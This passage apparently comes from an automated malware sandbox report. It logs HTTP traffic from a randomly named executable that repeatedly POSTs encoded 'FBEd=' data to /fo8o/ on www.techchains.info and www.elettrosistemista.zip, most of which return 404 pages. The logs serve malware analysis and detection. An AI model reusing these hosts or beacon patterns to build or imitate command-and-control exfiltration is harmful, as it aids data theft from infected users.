                                                                                                  Data Raw: 46 42 45 64 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 70 7a 41 73 55 6c 37 6a 41 46 57 58 33 6f 6f 5a 72 53 73 76 4a 58 4a 50 64 67 77 3d 3d
                                                                                                  Data Ascii: FBEd=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhpzAsUl7jAFWX3ooZrSsvJXJPdgw==
                                                                                                  May 8, 2024 10:50:45.065354109 CEST637INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:50:44 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  23192.168.2.104973466.29.149.46801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:50:47.588238001 CEST1807OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.techchains.info
                                                                                                  Origin: http://www.techchains.info
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 1229
                                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 6c 4d 79 74 78 4d 77 32 39 50 65 42 6b 57 43 67 36 39 42 57 38 2b 68 53 39 6e 52 2f 70 76 2f 72 6c 59 78 55 69 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 4e 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 [TRUNCATED]
                                                                                                  Data Ascii: FBEd=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1ylMytxMw29PeBkWCg69BW8+hS9nR/pv/rlYxUi0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JVW7MNLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvphzvUh4YgEGGneh5yUsf1M5awhSKDkhkpwe8S4VpcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyNbNQpjD2WsuHCTmWr3rLr5LHgzcN9xxzaNN806cSXciwIr1Tez0Zxov0TStDuGDPRSmGde/8okV45DSGyV7XCftj9ukapNE6qYEEzyeLs/5aj26YgFjK95s9e9ZT3YbtOumquX2VAEkDH+D53UCrP0ueFLgx6xWkCfKyNhB2D5iOmOR2yiQ3CgpxsCS+RpXyVAr3K0e3OF8znwOAIsS286Lb/Fs2EujjKMYkj9bNwdFYcu0/1yi2xeP38g8mvACZ9MiJRqth0Q3gdhoLIWGj5p4o9ILgiWbe61TFHLUpLM/MpdGLNWrT4EAoRWRLAZ4xmWTP/KhR83J32Tq1TwNhH6bq/nvZXGuO0aG4tyM4uoacI6Gjl6REaPHfjJE/N/PXYNpqtB5mvfHF3dSL0djN9HfvbVq4C5zvZT6i5/jkp3T4jfwNt4OzxFaB6nQTMqYtip758vLnkbpfOPU7gL9J0uNlKSU5XiXxCQQEaHVOAZAvnjpS0SEeXcwf/tkXxwT200N14O4EtETGzxSl8 [TRUNCATED]
                                                                                                  May 8, 2024 10:50:47.799176931 CEST637INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:50:47 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  24192.168.2.104973566.29.149.46801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:50:50.321676970 CEST501OUTGET /fo8o/?FBEd=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hbvgW/E7EGitLXVKOGZWUueXafmCZ6g==&4h8=YPQX8Tch HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Host: www.techchains.info
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  May 8, 2024 10:50:50.527709007 CEST652INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:50:50 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  25192.168.2.1049736195.110.124.133801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:50:56.555685997 CEST788OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.elettrosistemista.zip
                                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 193
                                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 52 51 72 32 34 49 61 57 76 65 45 77 52 5a 78 58 76 78 74 44 47 37 78 76 39 74 5a
                                                                                                  Data Ascii: FBEd=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiRQr24IaWveEwRZxXvxtDG7xv9tZ
                                                                                                  May 8, 2024 10:50:56.893878937 CEST367INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:50:56 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 203
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  26192.168.2.1049737195.110.124.133801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:50:59.425337076 CEST812OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.elettrosistemista.zip
                                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 217
                                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 2f 68 37 59 7a 61 66 32 65 39 37 32 4a 4f 62 73 48 36 72 69 52 72 49 4f 79 4d 77 3d 3d
                                                                                                  Data Ascii: FBEd=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxn/h7Yzaf2e972JObsH6riRrIOyMw==
                                                                                                  May 8, 2024 10:50:59.765860081 CEST367INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:50:59 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 203
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  27192.168.2.1049738195.110.124.133801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:03.462506056 CEST1825OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.elettrosistemista.zip
                                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 1229
                                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 53 66 2f 68 61 30 53 65 49 71 74 39 59 76 43 4b 61 73 43 35 6f 37 44 76 4a 62 39 53 36 53 68 77 4f 48 2b 6e 6e 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 75 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 [TRUNCATED]
                                                                                                  Data Ascii: FBEd=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKSf/ha0SeIqt9YvCKasC5o7DvJb9S6ShwOH+nnZ5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHXRpuuCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adY6OISb476q0Y+bu10hDKbenTSRmadHEf0eVQ5e72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQZK9J+v82n+8bZPo0Nr7SQ38lzIXClwTVPxq1Hwgj8JMdREJFA3BxuX7KJV1APZhBI1HF7stIRV3zyK4EWKrUzBXXJd1lPI6ARFntXU9f+OTNkDu3bX/n2oTR3tx3Ewd0gagFpgQIf7H/nmEJ77rrU4uHKJsxyunkmDTMnUuwx+ReZxyg80KZmYOLkwJB8gRXGcZzsbkEjdPwgsm5mu2bXuTV3gWk0yjasmprGYn0GXqzQo11V6OjES+nsii6idI2SPk8sxAhtpyE2rdJwnYD0v//hfsCUaLrg8fQUD0ny29uXdZFXSHobu8OhSYV04z2yFUczP/mc/PcOhDTlz5IgbSNEVUxpgBuaeOnOEXNBhn7k/Bkjy1wXuZCp+eM0YwZXaqGDZRxtWEdxffa1e/LPB2m/ddZGDB0PNzgFyMqopHxo38WOQNpYChPmiVUhwqQxYNPv3BhUKV9kNpMP8N6szTlwPzc1dpZsnfZIgRMmiBIxgNPZExJjK1Kfng0Skcl7bFwcA0XwD54SE8Z [TRUNCATED]
                                                                                                  May 8, 2024 10:51:03.799741983 CEST367INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:51:03 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 203
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  28192.168.2.1049739195.110.124.133801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:06.331902981 CEST507OUTGET /fo8o/?4h8=YPQX8Tch&FBEd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNnVmQq+khzPxid8+dZ7ofOMdeDHH5A== HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
